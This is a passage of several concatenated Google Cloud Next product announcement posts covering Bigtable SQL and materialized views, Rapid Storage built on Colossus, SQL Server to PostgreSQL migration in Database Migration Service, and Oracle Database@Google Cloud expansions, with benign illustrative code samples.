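from google.cloud.bigtable.data import BigtableDataClientAsync

async def main():
    async with BigtableDataClientAsync(project="my-project") as client:
        results = await client.execute_query(
            "SELECT _key, cf['clicks'] AS clicks FROM metrics LIMIT 10",
            instance_id="my-instance",
        )
        async for row in results:
            print(row["_key"], row["clicks"])

asyncio.run(main())
```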
Continuous materialized views, now in preview
Bigtable SQL integrates with Bigtable’s recently introduced continuous materialized views (preview), offering a solution to traditional materialized view limitations like data staleness and maintenance complexity. This allows for real-time aggregation and analysis of data streams across applications such as media streaming, e-commerce, advertising, social media, and industrial monitoring.
Bigtable materialized views are fully managed and update incrementally without impacting user queries from applications. They also support a rich SQL language, including functions and aggregations.
“With Bigtable’s new Materialized Views, we’ve unleashed the full potential of low-latency use cases for clients of our Customer Data Platform. By defining SQL-based aggregations/transformations at ingestion, we’ve eliminated the complexities and delays of ETL in our time series use cases. Moreover, using data transformations during ingestion, we’ve unlocked the ability for our AI applications to receive perfectly prepared data with minimal latencies,” said Sathish KS, Chief Technology Officer, Zeotap.
Continuous Materialized Views workflow
Ecosystem integrations
To get useful real-time analytics, you often need to pull data from many sources with very low latency. As Bigtable expands its SQL interface, it is also expanding its ecosystem compatibility, making it easier to build end-to-end applications using simple connectors and SQL.
Open-source Apache Kafka Bigtable Sink: Customers often rely on Google Cloud Managed Service for Apache Kafka to build pipelines that stream data into Bigtable and other analytics systems. To help customers build high-performance data pipelines, the Bigtable team has open-sourced a new Bigtable Sink for Apache Kafka, so you can send data from Kafka to Bigtable in milliseconds.
Open-source Apache Flink Connector for Bigtable: Apache Flink is a stream-processing framework that lets you manipulate data in real time. With the recently launched Apache Flink to Bigtable Connector, you can construct a pipeline that transforms streaming data and writes the outputs into Bigtable, using both the high-level Apache Flink Table API and the more granular Datastream API.
“BigQuery continuous queries enables our application to use real-time stream processing and ML predictions by simply writing a SQL statement. It’s a great service that allows us to launch products quickly and easily,” said Shuntaro Kasai and Ryo Ueda, MLOps Engineers, DMM.com.
Real-time Analytics in Bigtable overview
Bigtable CQL Client: Bigtable is now Cassandra-compatible, in preview
The Cassandra Query Language (CQL) is the query language of Apache Cassandra. With the launch of the Bigtable CQL Client, developers can now migrate their applications to Bigtable with minimal to no code change, and enjoy the familiarity of CQL on enterprise-grade, high-performance Bigtable. Bigtable also supports common tools in the Cassandra ecosystem, like the CQL shell (CQLsh), as well as Cassandra’s own data migration utilities, which enable seamless migrations from Cassandra with no downtime, significantly reducing operational overhead.
Get started using the Bigtable CQL Client and migration utilities here.
Convergence: NoSQL’s embrace of SQL power
In this blog, we discussed a significant advancement that empowers developers to use SQL with Bigtable. You can easily get started with the flexible SQL language from any existing Bigtable cluster using Bigtable Studio, and start creating materialized views on streams of data coming from Kafka and Flink.
As an object storage service, Google Cloud Storage is popular for its simplicity and scale, a big part of which is due to the stateless REST protocols that you can use to read and write data. But with the rise of AI and as more customers look to run data-intensive workloads, two major obstacles to using object storage are its higher latency and lack of file-oriented semantics. With the launch of Rapid Storage on Google Cloud, we’ve added a stateful gRPC-based streaming protocol that provides sub-millisecond read/write latency and the ability to easily append data to an object, while maintaining the high aggregate throughput and scale of object storage. In this post, we’ll share an architectural perspective into how and why we went with this approach, and the new types of workloads it unlocks.
It all comes back to Colossus, Google’s internal zonal cluster-level file system that underpins most (if not all) of our products. As we discussed in a recent blog post, Colossus supports our most demanding performance-focused products with sophisticated SSD placement techniques that deliver low latency and massive scale.
Another key ingredient in Colossus’s performance is its stateful protocol — and with Rapid Storage, we’re bringing the power of the Colossus stateful protocol directly to Google Cloud customers.
When a Colossus client creates or reads a file, the client first opens the file and gets a handle, a collection of state that includes all the information about how that file is stored, including which disks the file’s data is stored on. Clients can use this handle when reading or writing to talk directly to the disks via an optimized RDMA-like network protocol, as we previously outlined in our Snap networking system paper.
Handles can also be used to support ultra-low latency durable appends, which is extremely useful for demanding database and streaming analytics applications. For example, Spanner and Bigtable both write transactions to a log file that requires durable storage and that is on the critical path for database mutations. Similarly, BigQuery supports streaming to a table while massively parallel batch jobs perform computations over recently ingested data. These applications open Colossus files in append mode, and the Colossus client running in the application uses the handle to write their database mutations and table data directly to disks over the network. To ensure the data is stored durably, Colossus replicates its data across several disks, performing writes in parallel and using a quorum technique to avoid waiting on stragglers.
Figure 1: Steps involved in appending data to a file in Colossus.
The above image shows the steps that are taken to append data to a file.
The application opens the file in append mode. The Colossus Curator constructs a handle and sends it to the Colossus Client running in-process, which caches the handle.
The application issues a write call for an arbitrary-sized log entry to the Colossus Client.
The Colossus Client, using the disk addresses in the handle, writes the log entry in parallel to all the disks.
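To make the numbered steps concrete, here is a purely conceptual sketch of a handle-based quorum append. Colossus is internal to Google, so every type and method below is hypothetical; the sketch only models the behavior described above.

```python
# Conceptual sketch only: Disk, Handle, and quorum_append are hypothetical
# stand-ins for the open -> handle -> parallel quorum write flow above.
import random
import time
from concurrent.futures import ThreadPoolExecutor, as_completed

class Disk:
    """Stand-in for a disk server; append simulates variable latency."""
    def append(self, payload):
        time.sleep(random.uniform(0.001, 0.02))  # straggler variance
        return True

class Handle:
    """State handed to the client at open time: where the replicas live."""
    def __init__(self, replicas):
        self.replicas = replicas

def quorum_append(handle, payload, quorum=2):
    """Write to all replicas in parallel; return once a quorum acks,
    so a single straggling disk doesn't add latency."""
    pool = ThreadPoolExecutor(max_workers=len(handle.replicas))
    futures = [pool.submit(d.append, payload) for d in handle.replicas]
    acks = 0
    for f in as_completed(futures):
        if f.result():
            acks += 1
            if acks >= quorum:
                pool.shutdown(wait=False)  # leave stragglers to finish
                return True
    pool.shutdown(wait=False)
    return False

handle = Handle([Disk(), Disk(), Disk()])   # step 1: open returns the handle
print(quorum_append(handle, b"log entry"))  # steps 2-3: parallel append
```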
Rapid Storage builds on Colossus’s stateful protocol, leveraging gRPC-based streaming for the underlying transport. When performing low-latency reads and writes to Rapid Storage objects, the Cloud Storage client establishes a stream, providing the same request parameters used in Cloud Storage’s REST protocols, such as the bucket and object name. Further, all the time-consuming Cloud Storage operations such as user authorization and metadata accesses are front-loaded and performed at stream creation time, so subsequent read and write operations go directly to Colossus without any additional overhead, allowing for appendable writes and repeated ranged reads with sub-millisecond latency.
This Colossus architecture enables Rapid Storage to support 20 million requests per second in a single bucket, a scale that is extremely useful in a variety of AI/ML applications. For example, when pre-training a model, pre-processed, tokenized training data is fed into GPUs or TPUs, typically in large files that each contain thousands of tokens. But the data is rarely read sequentially; for example, random samples are read in different orders as training progresses. With Rapid Storage’s stateful protocol, a stream can be established at the start of the training run before executing massively parallel ranged reads at sub-millisecond speeds. This helps to ensure that accelerators aren’t blocked on storage latency.
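While the Rapid Storage client surface is still in preview, the read pattern itself can be sketched with the standard google-cloud-storage Python client, which already supports ranged reads. The bucket and object names and range sizes below are placeholders; a Rapid Storage stream would additionally amortize the authorization and metadata work across all the reads.

```python
# Sketch of parallel ranged reads with the standard google-cloud-storage
# client; bucket/object names are placeholders.
from concurrent.futures import ThreadPoolExecutor
from google.cloud import storage

client = storage.Client()
blob = client.bucket("training-data").blob("shard-0001.records")

def read_range(start, end):
    # start/end are inclusive byte offsets in download_as_bytes.
    return blob.download_as_bytes(start=start, end=end)

# Read 64 random-access 1 MiB samples in parallel.
ranges = [(i * 1024**2, (i + 1) * 1024**2 - 1) for i in range(64)]
with ThreadPoolExecutor(max_workers=16) as pool:
    samples = list(pool.map(lambda r: read_range(*r), ranges))
```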
Likewise, with appends, Rapid Storage takes advantage of Colossus’s stateful protocol to provide durable writes with sub-millisecond latency, and supports unlimited appends to a single object up to the object size limit. A major challenge with stateful append protocols is how to handle cases where the client or server hangs or crashes. With Rapid Storage, the client receives a handle from Cloud Storage when creating the stream. If the stream gets interrupted but the client wants to continue reading or appending to the object, the client can re-establish a new stream using this handle, which streamlines this flow and minimizes any latency hiccups. It gets trickier when there is a problem on the client, and the application wants to continue appending to an object from a new client. To simplify this, Rapid Storage guarantees that only one gRPC stream can write to an object at a time; each new stream takes over ownership of the object, transactionally locking out any prior stream. Finally, each append operation includes the offset that’s being written to, ensuring that data correctness is always preserved even in the face of network partitions and replays.
Figure 2: A new client taking over ownership of an object.
In the above image, a new client takes over ownership of an object, locking out the previous owner; the fencing logic is sketched in code after the steps below.
Initially, client 1 appends data to an object stored on three disks.
The application decides to fail over to client 2, which opens this object in append mode. The Colossus Curator transactionally locks out client 1 by increasing a version number on each object data replica.
Client 1 attempts to append more data to the object, but cannot because its ownership was tied to the old version number.
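Here is an illustrative model (not the Rapid Storage implementation) of that version-number fencing, including the offset check from the append protocol:

```python
# Illustrative model: each replica tracks the highest version it has
# granted; appends from stale streams are rejected, and each append must
# state the offset it writes to, so replays and reorders are caught.
class Replica:
    def __init__(self):
        self.version = 0
        self.data = bytearray()

    def open_for_append(self):
        self.version += 1              # a new stream takes over ownership
        return self.version

    def append(self, version, offset, payload):
        if version < self.version:
            raise PermissionError("stale stream: ownership was taken over")
        if offset != len(self.data):
            raise ValueError("offset mismatch: replayed or reordered append")
        self.data += payload

replica = Replica()
v1 = replica.open_for_append()
replica.append(v1, 0, b"from client 1")
v2 = replica.open_for_append()          # client 2 opens: version is bumped
replica.append(v2, len(replica.data), b"from client 2")
try:
    replica.append(v1, len(replica.data), b"from client 1 again")
except PermissionError as e:
    print(e)                            # client 1 is fenced out
```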
To make it as easy as possible to integrate Rapid Storage into your applications, we are also updating our SDKs to support gRPC streaming-based appends and expose a simple application-oriented API. Writing data using handles is a familiar concept in the filesystems world, so for low-latency file-oriented workloads we’ve integrated Rapid Storage into Cloud Storage FUSE, which provides clients with file-like access to Cloud Storage buckets. Rapid Storage also natively enables Hierarchical Namespace as part of its zonal bucket type, providing enhanced performance, consistency, and folder-oriented APIs.
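On the FUSE path, appends reduce to ordinary file I/O once a bucket is mounted. A minimal sketch, assuming a bucket already mounted with gcsfuse; the mount point and path are placeholders, and append semantics for zonal buckets may evolve during the preview:

```python
# Assumes the bucket is already mounted, e.g.: gcsfuse my-bucket /mnt/gcs
# With Rapid Storage zonal buckets, append-mode writes via Cloud Storage
# FUSE map onto object appends.
log_path = "/mnt/gcs/logs/training-events.log"

with open(log_path, "ab") as f:        # ordinary append-mode file I/O
    f.write(b'{"event": "checkpoint_saved", "step": 1200}\n')
```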
In short, Rapid Storage combines the sub-millisecond latency of block-like storage, the throughput of a parallel filesystem, and the scalability and ease of use of object storage, and it does all this in large part due to Colossus. Here are some interesting workloads we’ve seen our customers explore during the preview:
AI/ML data preparation, training, and checkpointing
Distributed database architecture optimization
Batch and streaming analytics processing
Video live-streaming and transcoding
Logging and monitoring
Interested in trying Rapid Storage? Indicate your interest here or reach out through your Google Cloud representative.
As organizations continue to prioritize cloud-first strategies to accelerate innovation and gain competitive advantage, legacy databases remain a bottleneck, hindering modernization and stifling growth with restrictive licensing, complex agreements, and rigid infrastructure.
That’s why this week at Google Cloud Next, we’re announcing that Database Migration Service (DMS) is extending its comprehensive database modernization offering to support SQL Server to PostgreSQL migrations, enabling you to unlock the potential of open-source databases in the cloud and build modern, scalable, and cost-effective applications.
While the benefits are significant, migrating from SQL Server to a modern, managed PostgreSQL offering like AlloyDB or Cloud SQL can be a highly complex task. Even though SQL Server and PostgreSQL both adhere to SQL standards, they have fundamental differences in their architectures, data types, and procedural languages, which means a successful migration requires deep expertise in both technologies.
For example, SQL Server’s T-SQL syntax and built-in functions often require manual translation to PostgreSQL’s PL/pgSQL. Data type mappings can be intricate, as SQL Server’s DATETIME precision and NVARCHAR handling differ from PostgreSQL’s equivalents.
Furthermore, features like SQL Server’s stored procedures, triggers, and functions often necessitate significant refactoring to align with PostgreSQL’s implementation. This demands deep knowledge of both database systems and specific migration expertise that developers typically don’t possess, plus hours of painstaking work, even with the benefit of an automated conversion tool.
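To make the gap concrete, here is a toy illustration, emphatically not DMS’s conversion engine, of the kind of mechanical T-SQL-to-PostgreSQL mappings involved; the table covers only a few common constructs:

```python
# Toy illustration of algorithmic T-SQL -> PostgreSQL mapping; real
# conversion engines parse the SQL rather than rewrite strings.
TSQL_TO_POSTGRES = {
    "GETDATE()": "NOW()",        # current timestamp
    "ISNULL(": "COALESCE(",      # null substitution
    "NVARCHAR": "VARCHAR",       # PostgreSQL strings are Unicode-native
    "DATETIME": "TIMESTAMP(3)",  # DATETIME has ~3.33 ms precision
    "TOP 10 ": "",               # SELECT TOP n -> LIMIT n (appended below)
}

def convert(tsql: str) -> str:
    out = tsql
    for src, dst in TSQL_TO_POSTGRES.items():
        out = out.replace(src, dst)
    if "TOP 10" in tsql:
        out += " LIMIT 10"
    return out

print(convert("SELECT TOP 10 name, ISNULL(city, 'n/a'), GETDATE() FROM users"))
# -> SELECT name, COALESCE(city, 'n/a'), NOW() FROM users LIMIT 10
```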
Simplifying database modernization with Database Migration Service
DMS is a fully-managed, serverless cloud service that offers a complete set of capabilities to simplify database “lift and shift” migrations and database modernization journeys.
For modernization efforts, DMS offers an interactive experience that includes data migration as well as schema and database-resident code conversion, all in the same powerful user interface. For data migration, it offers high-throughput database initial loads followed by low-latency change data capture to reduce downtime and minimize the impact on business-critical applications.
Announcing SQL Server to PostgreSQL migration
The new SQL Server to PostgreSQL migration experience supports the migration of both self-managed and cloud-managed SQL Server offerings to Cloud SQL for PostgreSQL and AlloyDB, accelerating your database modernization journey. Like the existing database modernization offerings, this new experience features a high-throughput initial load of the database followed by seamless change data capture (CDC) replication to synchronize the SQL Server source and PostgreSQL destination, all while the production application is up and running, minimizing business interruption.
Database Migration Service is designed to automate the most difficult SQL Server to PostgreSQL migration steps.
For SQL Server schema and code conversion, DMS offers a fast, customizable algorithmic code conversion engine that automates the conversion of most of the database schema and code to the appropriate PostgreSQL dialect, leaving minimal manual conversion work for the user to complete.
The algorithmic conversion engine maps the source database data types and SQL commands to the most suitable PostgreSQL equivalents, and even refactors complex source features that have no direct PostgreSQL counterpart to achieve the same functionality using available PostgreSQL capabilities. Algorithmic engines are, by nature, extremely accurate for the scenarios they are programmed to handle. However, they are limited to just those scenarios, and real-life database code inevitably includes cases that can’t be anticipated.
For these situations, we’re pushing the boundaries of automated database modernization with the introduction of the Gemini automatic conversion engine. This new engine automatically augments the output of the algorithmic conversion, further automating the conversion tasks and reducing the amount of remaining manual work. It also provides a comprehensive conversion report, highlighting which parts of the code were enhanced, why they were changed, and how they were converted.
Instead of spending time researching suitable PostgreSQL features and fixing conversion issues yourself, you can simply review the Gemini recommendations in the conversion report and mark the conversion as verified, which significantly reduces the manual migration effort and speeds up the conversion process.
To further empower SQL Server DBAs, DMS offers Gemini-powered conversion assistance that doubles as targeted yet comprehensive SQL Server to PostgreSQL training. Gemini analyzes both the source and the converted code and explains the conversion rationale, highlighting the chosen PostgreSQL features, why they were used, and how they compare to the SQL Server ones. It can then optimize the migrated code for better performance and automatically generate comprehensive comments for better long-term maintainability.
Database Migration Service provides detailed explanations of SQL Server to PostgreSQL conversions.
At Google Cloud, we’ve been working closely with customers looking to modernize their database estate. One of them is Wayfair LLC, an American online home store for furniture and decor.
“Google Cloud’s Database Migration Service simplifies the process of modernizing databases. Features like Change Data Capture to reduce downtime and AI-assisted code conversion help evolve our database usage more efficiently. This makes the migration process less manual and time-consuming, allowing teams to spend more time on development and less on infrastructure,” said Shashank Srivastava, software engineering manager, Data Foundations, Wayfair.
How to get started
To start your Gemini-powered SQL Server migration, navigate to the Database Migration page in the Google Cloud console and follow these simple steps (a scripted sketch of the first step follows the list):
Create your source and destination connection profiles, which contain information about the source and destination databases. These connection profiles can later be used for additional migrations.
Create a conversion workspace that automatically converts your source schema and code to a PostgreSQL schema and compatible SQL. Make sure you enable the new Gemini-powered conversion workspace capabilities.
Review the converted schema objects and SQL code, and apply them to your destination Cloud SQL for PostgreSQL or AlloyDB for PostgreSQL instance.
Create a migration job and choose the conversion workspace and connection profiles previously created.
Test your migration job and get started whenever you’re ready.
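These steps can also be scripted. The following is a hedged sketch of creating the source connection profile (step 1) with the DMS Python client from the google-cloud-dms package; the SqlServerConnectionProfile message and its fields are assumptions about the current v1 surface, so verify them against the API reference before use.

```python
# Hedged sketch: creating a SQL Server source connection profile with the
# DMS Python client. The sqlserver message/field names are assumptions.
from google.cloud import clouddms_v1

client = clouddms_v1.DataMigrationServiceClient()
parent = "projects/my-project/locations/us-central1"

profile = clouddms_v1.ConnectionProfile(
    display_name="sqlserver-source",
    sqlserver=clouddms_v1.SqlServerConnectionProfile(  # assumed message name
        host="10.0.0.5",
        port=1433,
        username="migration_user",
        password="...",  # prefer Secret Manager over inline secrets
    ),
)

# create_connection_profile returns a long-running operation.
operation = client.create_connection_profile(
    parent=parent,
    connection_profile_id="sqlserver-source",
    connection_profile=profile,
)
print(operation.result().name)  # resolves to the created profile
```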
To learn more about how Database Migration Service can help you modernize your SQL Server databases, please review our DMS documentation and start your migration journey today.
Supporting customers where they want to be is a core value at Google Cloud, and a big part of the reason that we have partnered with Oracle — so that you can innovate faster with the best of Google and the best of Oracle.
This week at Google Cloud Next, we announced significant expansions to our Oracle Database offerings, including the preview of Oracle Base Database Service for a flexible and controllable way to run Oracle databases in the cloud; general availability of Oracle Exadata X11M, bringing the latest generation of the Oracle Exadata platform to Google Cloud; and additional enterprise-ready capabilities including customer-managed encryption keys (CMEK).
We are continuing to invest in global infrastructure for Oracle, with a total of 20 locations available in the coming months, adding Oracle Database@Google Cloud presence in Australia, Brazil, Canada, India, Italy, and Japan.
These announcements follow our developments with Oracle since last July, when we launched Oracle Database@Google Cloud. This partnership enables customers to migrate and modernize their Oracle workloads and start taking advantage of Google’s industry-leading data and AI capabilities such as BigQuery, Vertex AI platform, and Gemini foundation models.
Additional features provide customers with even more options in their modernization journey, such as the fully managed Oracle Autonomous Database Serverless. They can also benefit from increased reliability and resiliency features, such as cross-region disaster recovery and Oracle Maximum Availability Architecture (MAA) Gold certification.
“Banco Actinver is committed to providing innovative financial solutions to our clients. By combining the security and performance of Oracle Database with Google Cloud’s data analytics and AI tools, we’re gaining deeper insights into market trends, enhancing our services, and delivering personalized experiences to our customers,” said Jorge Fernandez, CIO, Banco Actinver.
Innovative new capabilities
We’re expanding our offerings to empower customers with the flexibility to manage a diverse set of database workloads cost effectively.
Oracle Base Database Service: The new Base Database Service delivers a highly controllable and customizable foundational database platform, built on Oracle Cloud Infrastructure (OCI) virtual machines and general-purpose infrastructure, giving businesses the flexibility to manage a diverse range of database workloads directly.
Enhanced Oracle Database Services: In addition to the availability of Exadata Cloud Service, Autonomous Database Service, Oracle Linux, and Oracle on Google Compute Engine (GCE) and Google Kubernetes Engine (GKE), we are pleased to share the general availability of Oracle Exadata X11M. Oracle Database@Google Cloud now offers this latest generation of Oracle Exadata machines, which provide significant performance gains and increased capacity, enabling customers to run even the most intensive Oracle applications with ease. X11M will be available in all new regions.
Customers are embracing Oracle Database@Google Cloud, and to support their global needs, we’re expanding our footprint while maintaining the highest standards of application performance and reliability.
Expanding to 20 Oracle Database@Google Cloud locations in the coming months: To further support the growing demand for Oracle workloads on Google Cloud, we are launching in more locations, including U.S. Central 1 (Iowa), North America-Northeast 1 (Montreal), North America-Northeast 2 (Toronto), Asia-Northeast 1 (Tokyo), Asia-Northeast 2 (Osaka), Asia-South 1 (Mumbai), Asia-South 2 (Delhi), South America-East 1 (Sao Paulo), Europe-West (Italy), Australia-Southeast 2 (Melbourne), and Australia-Southeast 1 (Sydney), as well as additional zones in Ashburn, Frankfurt, London, Melbourne, and Italy. The new regions and expanded capacity are in addition to Google Cloud regions across U.S. East (Ashburn), U.S. West (Salt Lake City), U.K. South (London), and Germany Central (Frankfurt) that are available today.
New Partner Cross-Cloud Interconnect availability: We’re pleased to expand our global network offerings with new Partner Cross-Cloud Interconnect for OCI connectivity between Google Cloud and Oracle Cloud Infrastructure in Toronto and Zurich. This complements the 11 regions already served, helping ensure the lowest possible latency between both clouds while keeping traffic private and secure.
Cross Region Disaster Recovery: Cross Region Disaster Recovery support for Oracle workloads on Oracle Autonomous Database ensures high availability and resilience, protecting against potential outages and providing continuous operation for critical applications.
Enterprise-grade networking upgrades: Advanced networking upgrades enable enterprises to efficiently deploy their Oracle resources alongside Google Cloud resources and share them.
Industry-leading certifications and user experience
Google Cloud is committed to providing a seamless and efficient experience for Oracle customers, ensuring that managing and utilizing Oracle databases is straightforward and effective. We offer a combination of native Google Cloud tools and Oracle Cloud Infrastructure (OCI) interfaces, along with robust support for various applications and systems.
Enhanced user experience: We offer a Google Cloud-integrated user experience for application developers and routine database operations, alongside an OCI-native experience for advanced database management. This includes support for Shared VPC, APIs, SDKs, and Terraform.
Application support: Google Cloud now supports Oracle applications running on Google Cloud, including Oracle E-Business Suite, PeopleSoft Enterprise, JD Edwards EnterpriseOne, Hyperion Financial Management, and Retail Merchandising, ensuring compatibility and optimal performance.
SAP and Oracle Capability: Oracle workloads on Google Compute Engine are now supported by SAP and Oracle, further validating Google Cloud as a trusted platform for running enterprise applications.
Integration with Google Cloud Monitoring: Provides enterprises with a unified monitoring and alerting mechanism across all their Google Cloud database services, now including Oracle Database.
New support in Google Cloud Backup and DR: Our backup service now provides central, policy-based management for backup of Oracle workloads along with other Google Cloud services using secure backup vaults for data protection — isolating and protecting data from threats like ransomware and accidental deletion.
Google Cloud’s strengths make it the preferred hyperscaler for running mission-critical Oracle workloads.
Get started right away from your Google Cloud Console or learn more here.